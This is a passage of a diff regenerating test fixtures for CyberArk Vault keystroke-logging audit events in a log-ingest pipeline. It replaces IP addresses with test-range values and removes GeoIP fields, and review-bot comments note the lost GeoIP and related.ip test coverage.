System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMDisabled\\\" Value=\\\"No Reason\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Customer\\\" Value=\\\"Tesla\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.6.0000\",\"MessageID\":\"361\",\"IsoTimestamp\":\"2021-03-16T15:01:00Z\",\"Desc\":\"Keystroke logging\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Keystroke logging\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Linux\",\"File\":\"Root\\\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2\",\"Station\":\"10.2.0.7\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=ls \\\"/var/tmp\\\";ConnectionComponentId=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=499852f2-22b5-11eb-8bff-000c297aae88;SrcHost=10.2.0.6;SSHOffset=3642B;User=admin2;VIDOffset=125T;\",\"Message\":\"Keystroke logging\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"LINUX-SSH\"},{\"Name\":\"UserName\",\"Value\":\"admin2\"},{\"Name\":\"Address\",\"Value\":\"radiussrv.cyberark.local\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"CPMDisabled\",\"Value\":\"No Reason\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"Customer\",\"Value\":\"Tesla\"}]}}}}", "code": "361", "kind": "event", 
@@ -108,39 +108,18 @@
 }
 },
 "destination": {
- "geo": {
- "continent_name": "North America",
- "country_name": "United States",
- "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
- },
- "address": "34.123.103.115",
 "user": {
 "name": "testark"
 },
- "ip": "34.123.103.115"
+ "address": "67.43.156.15",
+ "ip": "67.43.156.15"
 },
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "address": "81.32.170.205",
 "user": {
 "name": "Administrator"
 },
- "ip": "81.32.170.205"
+ "address": "67.43.156.13",
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -157,7 +136,7 @@
 },
 "@timestamp": "2021-03-14T13:49:49.000Z",
 "file": {
- "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark"
+ "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark"
 },
 "ecs": {
 "version": "1.12.0"
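Review bot: The regenerated expectation removes the `destination.geo` and `source.geo` objects outright (the `- "geo": {` blocks under both `"destination"` and `"source"`) and adds nothing in their place, so this case no longer verifies the pipeline's GeoIP enrichment at all. If the GeoIP database bundled with the pipeline test runner has records for the 67.43.156.0/24 range, a geo block should have come back here and the file may have been regenerated against a different database; if it does not, keeping at least one event on an address that does resolve would preserve coverage of the geoip processors. The `@@ -157,7 +136,7 @@` hunk in the same line only follows the path rename and needs nothing further.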
@@ -168,16 +147,15 @@ "testark" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-14T13:49:49Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 06:49:49\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T13:49:49Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e361\u003c/MessageID\u003e\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eCommand=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=10T;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty 
Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615729572\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 06:49:49\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T13:49:49Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e361\u003c/MessageID\u003e\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n 
\u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eCommand=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=10T;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615729572\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Keystroke logging", "issuer": "Administrator", "extra_details": { 
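Review bot: The `related.ip` array in this hunk shrinks from three entries to two because the replacement made `Station` identical to `DstHost` (both `67.43.156.15`), so the expectation no longer checks that a station address distinct from source and destination is added to `related.ip`. Choosing a third address from the supported test subset for `Station` in the log file, and regenerating, would keep that branch covered. The `raw` change in this hunk is only the consequence of the log-file edit and is fine as is.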
@@ -191,14 +169,14 @@
 "managed_account": "Yes",
 "psmid": "PSMServer",
 "session_id": "d284c268-2ba0-4366-af52-e33459b073a1",
- "src_host": "81.32.170.205",
- "dst_host": "34.123.103.115",
+ "src_host": "67.43.156.13",
+ "dst_host": "67.43.156.15",
 "command": "sudo su"
 },
 "rfc5424": true,
 "ca_properties": {
 "other": {},
- "address": "34.123.103.115",
+ "address": "67.43.156.15",
 "creation_method": "PVWA",
 "cpm_status": "failure",
 "policy_id": "UnixSSH",
@@ -210,9 +188,9 @@
 "reset_immediately": "ReconcileTask",
 "last_task": "ReconcileTask"
 },
- "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark",
+ "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark",
 "safe": "partner",
- "station": "34.71.250.247",
+ "station": "67.43.156.15",
 "action": "Keystroke logging",
 "timestamp": "Mar 14 06:49:49",
 "desc": "Keystroke logging"
@@ -223,8 +201,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:34.191933600Z", - "original": "\u003c5\u003e1 2021-03-14T13:49:49Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:49:49\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:49:49Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e361\u003c/MessageID\u003e\\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=10T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n 
\u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615729572\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:49:49\",\"IsoTimestamp\":\"2021-03-14T13:49:49Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"361\",\"Desc\":\"Keystroke logging\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Keystroke logging\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=10T;\",\"Message\":\"Keystroke 
logging\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615729572\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:37:00.165101100Z", + "original": "\u003c5\u003e1 2021-03-14T13:49:49Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:49:49\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:49:49Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e361\u003c/MessageID\u003e\\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n 
\u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=10T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615729572\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:49:49\",\"IsoTimestamp\":\"2021-03-14T13:49:49Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"361\",\"Desc\":\"Keystroke logging\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Keystroke logging\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=10T;\",\"Message\":\"Keystroke logging\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615729572\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "361", "kind": "event", "action": "keystroke logging", @@ -246,39 +224,18 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "testark" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -295,7 +252,7 @@ }, "@timestamp": "2021-03-15T10:32:04.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" 
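Review bot: The regenerated expectation removes the whole `destination.geo` and `source.geo` objects instead of re-pointing them at the new addresses, so from this hunk on the fixture no longer asserts that the pipeline's GeoIP enrichment produces anything; the same removal appears in the `@@ -382,39 +338,18 @@` hunk of this file. The commit description only says the test IPs were moved to the supported subset, so it is worth confirming that an empty geo result is the expected outcome for 67.43.156.13 and 67.43.156.15 in the test GeoIP database rather than a sign the geoip processor was unavailable when the expectations were regenerated. If the absence is intended, a short sentence in the changelog entry or the data stream's test README stating that geo fields are deliberately not covered by these fixtures would stop the next regeneration from reading as a regression.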
@@ -306,16 +263,15 @@ "testark" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-15T10:32:04Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 03:32:04\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T10:32:04Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e361\u003c/MessageID\u003e\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eCommand=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;SSHOffset=1312B;User=testark;VIDOffset=6T;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty 
Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"success\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"-1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 03:32:04\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T10:32:04Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e361\u003c/MessageID\u003e\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eCommand=sudo 
